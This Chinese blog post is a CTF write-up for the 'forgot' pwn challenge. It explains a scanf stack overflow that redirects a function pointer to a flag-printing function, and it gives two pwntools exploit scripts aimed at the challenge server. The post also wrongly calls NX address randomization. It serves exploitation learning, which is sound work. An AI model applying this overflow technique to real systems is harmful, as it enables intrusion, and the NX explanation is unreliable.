pwn-进阶-forgot

最新推荐文章于 2023-01-13 12:25:16 发布
最新推荐文章于 2023-01-13 12:25:16 发布
阅读量1.2k 收藏 5
点赞数 1
文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45971758/article/details/119790696
版权

1.checksec先检查,开启的保护以及程序情况。

检查结果
开启了NX(地址随机化保护) , 就意味着程序块的地址随机分布在虚拟内存空间( virtual memory )不懂得去看《程序员的修养》(最火的那本)。

32位小段序,输入的变量数据在地址中的存放位置(按照小段序存放)。

2.静态调试(静态查看,静态分析)

将文件拖入到 ida 32位,然后确定。

在这里插入图片描述

shift+F12看到程序出现的字符串,发现下面。在这里插入图片描述

有./flag cat %s , 双击字符串并且看到了在.rodata 的存放位置,后面还有一个函数。

在这里插入图片描述
双击此函数,查看函数全部信息。
在这里插入图片描述

这样就看到了函数全貌。之后按F5(笔记本电脑键盘FN+F5),查看程序伪代码。

在这里插入图片描述
看到伪代码如下:
snprintf()函数。
【函数原型】

int snprintf(char *str, size_t size, const char *format, …);

【函数参数】

str:目标字符串;size:拷贝字节数(Bytes); format:源字符串; …格式

【函数功能】

最多从源字符串format中拷贝size字节的内容(含字符串结尾标志’\0’)到目标字符串
在这里插入图片描述
实现获得flag{xxxxxx}
怎么能执行int sub_80486CC()函数呢?
哦对,接着分析main()主函数,一切都要从主函数开刀。
ida分析F5伪代码。
在这里插入图片描述

注意到有这么个输入函数:

isoc99_scanf()利用此函数进行注入payload,由于isoc99_scanf()函数没有字节限制,可以往这里面打入payload。
在这里插入图片描述
在伪代码的最后,看到这个函数指针,我不会,看上去一脸懵,现在会了就是要让这个函数指针跳转到v3变量的所在地址。
解释一下:
&就是取地址 *(&v3)就是间接访问v3指向的函数 而后面那个()是用来存放参数的 这里没有参数。
理想情况要这样 ( (&v3+0)) 也就是 –v14=0,v14=1,这就意味着swtich(1)里面的函数要挨个运行,所以要构造一个符合条件的并且执行到((&v3 + --v14))();
在这里插入图片描述

方法一:第一种payload,入手点V12_return_addrss。

条件:
switch(v14)        # (v14=1)

让函数的payload通过switch(v14){的10个规则},并且这时候v14=10,确保了switch里面的C语句不报错。

payload=1234567@qq.com #这个邮箱就通过switch(v14){的10个规则}检查。

那就后面继续加123,这样也通过了检查。

#> 1234567@qq.com123
😃 Valid hai!

那咱们不加123,改换加点 垃圾数据返回地址(内容:sub_80486CC()函数地址)

payload+= (0x74 - 0x30 - len(payload)) * ‘a’ +p32(0x080486CC) #填充垃圾数据并且覆盖 第10个函数 返回地址。

0x74和0x30下图中有,一看就明白。

原因:由于isoc99_scanf()函数没有字节限制,程序就会写出char v2[32],产生栈溢出。
在这里插入图片描述
char v2[32];
定义了一个有32个元素的数组,元素类型为字符。
在这里插入图片描述

触发 =>函数指针

指针跳转到V3函数,执行v12的返回地址(内容:sub_80486CC()函数地址)。
执行sub_80486CC()函数,查询cat ./flag。

forgot1.py

# python3.x里默认的str是(py2.x里的)unicode, bytes是(py2.x)的str, b‘’前缀代表的就是bytes python2.x里。
#不加b'',python3运行报错。
from pwn import *

context.log_level = 'debug'
con = remote('111.200.241.244',49225)

con.sendlineafter(b'> ', 'peony001')
payload = b'1234567@qq.com'
payload += (0x74 - 0x30 - len(payload)) * b'a'
payload += p32(0x080486CC)

con.sendlineafter(b'> ', payload)
con.interactive()

运行forgot1.py 。

python3 forgot1.py

在这里插入图片描述

方法二:第二种payload,入手点EAX

call eax
现在不会,gdb动态调试,学会了再写解释。

from pwn import *
p=remote("111.200.241.244",50499)
p.recvuntil(b'>')
p.sendline(b"test")
payload = b'a'* 36 + p32(0x080486CC)
p.sendlineafter(b'>',payload)
p.interactive()
Adm8n
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
C语言ISO C99标准
08-03
PDF格式书籍《C语言ISO C99标准》 ISO/IEC 9899:1999 (E)
二进制炸弹(深入理解计算机系统)
zhaoyue008的博客
06-02 1278
深入理解计算机系统lab2:bomblab二进制炸弹实验总结
Linux平台下GCC和GDB的使用注意点
q15189805906的博客
04-20 714
在学习《大话数据结构》的链式二叉树结构时,我不经意对作者的源码做了一些修改,将原本的ABDH#K###E##CFI###G#J##改成了ABD##CR##(#代表NULL),当时改的时候没有考虑到二叉树构造的合理性问题,事实上,后者是不符合规范的,所以编译运行之后,GCC出现了“段错误 (核心已转储)”这么一个错误提示。而当时我以为是源代码有问题,因此首先想到的便是分析源码的正确性。 正是这么一
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
绕过与栈溢出
qq_43579237的博客
10-11 200
note-service2 首先查看程序防护 开启了Canary与PIE 反编译 我们可以发现无堆溢出,但在申请堆块时有数组的下标溢出,可在任意地址申请堆块。userdata最多申请8个字节,但是只能写入7个字节。所有我们可以通过数组下标溢出,对got表复写,也可以对函数进行got表复写。所以我们申请一个堆块,写入字符串’/bin/sh’。申请多个chunk,分组将shellcode写入连续的堆块中,在最后两个字节构造跳转到下一个shellcode的指令,调用free函数,下标为之前写入字符串’/b
Linux pwn入门教程(3)——ROP技术
xiaoi123的博客
07-10 7529
作者:Tangerine@SAINTSEC原文来自:https://bbs.ichunqiu.com/thread-42530-1-1.html0×00 背景在上一篇教程的《shellcode的变形》一节中,我们提到过内存页的RWX三种属性。显然,如果某一页内存没有可写(W)属性,我们就无法向里面写入代码,如果没有可执行(X)属性,写入到内存页中的shellcode就无法执行。关于这个特性的实验在...
白泽知识讲堂 | printf漏洞介绍
木牛的博客
01-13 697
我们已经知道,printf函数在执行时,首先进行格式化字符串的解析——从栈(或者寄存器)获取参数并与符号说明进行匹配,然后将匹配的结果输出到屏幕上。相信大家对于简单的符号说明并不陌生,但如果要利用。,而我们又能控制格式化字符串时,只要我们构造一个合适的payload,一个'%K$s'和一个任意合理地址,(由于我们可以使用多个%p的方法找到合适的K来对应这个地址),我们便可以。,表明写入的长度,h表示一次覆盖两个byte,而hh表示一次写入一个byte,如果不对n进行修饰,则默认为写入四个byte。
【计算机系统(2)】3 逆向工程实验
深大cs课程实验及学习笔记,ccfcsp部分真题,华为题库
06-19 1481
本实验设计为一个黑客拆解二进制炸弹的游戏。我们仅给黑客(同学)提供一个二进制可执行文件bomb_64和主函数所在的源程序bomb_64.c,不提供每个关卡的源代码。程序运行中有6个关卡(6个phase),每个关卡需要用户输入正确的字符串或数字才能通关,否则会引爆炸弹(打印出一条错误信息,并导致评分下降)! 要求同学运用GDB调试工具和objdump反汇编工具,通过分析汇编代码,找到在每个phase程序段中,引导程序跳转到“explode_bomb”程序段的地方,并分析其成功跳转的条件...
三个pwn
weixin_52640415的博客
06-28 1622
shortcut :格式化字符串漏洞写溢出 lucky_guy:alloca负值覆盖ret babynote:libc-2.31禁用exec写 ORW free_hook->sigreturnframe-> setcontex+61->orw
攻防世界pwn题--stack2
L0g1c的博客
10-31 475
查看保护机制 (有栈不可执行NX,有canary保护) 用IDA分析(查看伪代码) int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // eax unsigned int v5; // [esp+18h] [ebp-90h] unsigned int v6; // [esp+1Ch] [ebp-8Ch] int v7; // [esp+20h] [ebp-88h] unsigned
pwn-200题目文件
02-16
pwn-200题目文件
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
PWN-Challenges
03-17
PWN挑战 在这里,我要添加一些我完成的CTF的PWN挑战文章...。
机械设计试验机sw20可编辑非常好的设计图纸100%好用.zip
最新发布
05-02
机械设计试验机sw20可编辑非常好的设计图纸100%好用.zip
JSP基于WEB的图书馆借阅系统的设计与实现(源代码+论文).zip
05-02
JSP基于WEB的图书馆借阅系统的设计与实现(源代码+论文)
1_6_huh猫(扭曲声音)_分p整合猫meme素材90+(持续更新中).mp4
05-02
1_6_huh猫(扭曲声音)_分p整合猫meme素材90+(持续更新中).mp4
【超炫购物模板】仿拍鞋网商城首页触屏版html5手机wap购物网站模板下载.zip
05-02
【超炫购物模板】仿拍鞋网商城首页触屏版html5手机wap购物网站模板下载.zip
国内外顶尖信用评级方法+18个行业信用评级指标体系+穆迪评级方法
05-02
国内外顶尖评级方法 中诚信评级方法汇总 18个行业评级指标体系文档 募集+法律意 见书+评级报告案例 穆迪评级方法 某公司债券募集说明书及评级报告-经典案例 国 内外顶尖评级方法.part2.rar (13.32 MB)
攻防世界pwn-forgot
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值